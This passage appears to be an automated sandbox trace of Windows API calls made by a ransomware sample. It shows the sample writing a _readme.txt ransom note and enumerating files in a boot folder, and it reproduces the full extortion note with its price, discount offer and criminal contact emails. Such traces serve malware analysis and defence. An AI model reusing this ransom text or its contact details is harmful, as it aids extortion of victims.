(HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.653] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.653] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.653] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.653] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.653] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.653] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.653] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.653] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.653] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.653] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.653] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.653] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.653] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.653] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.653] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.653] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.653] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.653] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.653] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.653] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.653] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.653] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.653] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.653] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.653] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.653] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.653] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.653] PathFindFileNameW (pszPath="C:\\Boot\\pl-PL\\") returned="pl-PL\\" [0228.654] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0228.654] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd450 | out: hHeap=0x620000) returned 1 [0228.654] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.654] PathFindFileNameW (pszPath="") returned="" [0228.654] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75330000 [0228.654] GetProcAddress (hModule=0x75330000, lpProcName="SHGetFolderPathW") returned 0x753b5708 [0228.654] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b78058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.654] FreeLibrary (hLibModule=0x75330000) returned 1 [0228.654] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.654] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.654] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79140 | out: hHeap=0x620000) returned 1 [0228.654] PathAppendW (in: pszPath="C:\\Boot\\pl-PL\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pl-PL\\_readme.txt") returned 1 [0228.654] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.654] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79140 | out: hHeap=0x620000) returned 1 [0228.654] PathFileExistsW (pszPath="C:\\Boot\\pl-PL\\_readme.txt") returned 0 [0228.655] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x3b7b818 [0228.655] lstrcpyW (in: lpString1=0x3b7b818, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" [0228.655] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda", lpString2="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" [0228.655] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3467538 [0228.655] CreateFileW (lpFileName="C:\\Boot\\pl-PL\\_readme.txt" (normalized: "c:\\boot\\pl-pl\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.655] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3467538 | out: hHeap=0x620000) returned 1 [0228.655] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b818 | out: hHeap=0x620000) returned 1 [0228.655] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.655] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79140 [0228.655] FindFirstFileW (in: lpFileName="C:\\Boot\\pl-PL\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.656] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79140 | out: hHeap=0x620000) returned 1 [0228.656] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0228.656] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0228.656] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0228.656] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.656] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.656] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd540 | out: hHeap=0x620000) returned 1 [0228.656] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd540 [0228.656] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.656] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.656] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.656] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.656] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.656] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.656] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.656] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.656] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.656] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.656] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.656] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.656] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.656] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.656] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.656] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.657] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.657] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.657] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.657] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.657] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0228.657] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.657] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0228.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.663] 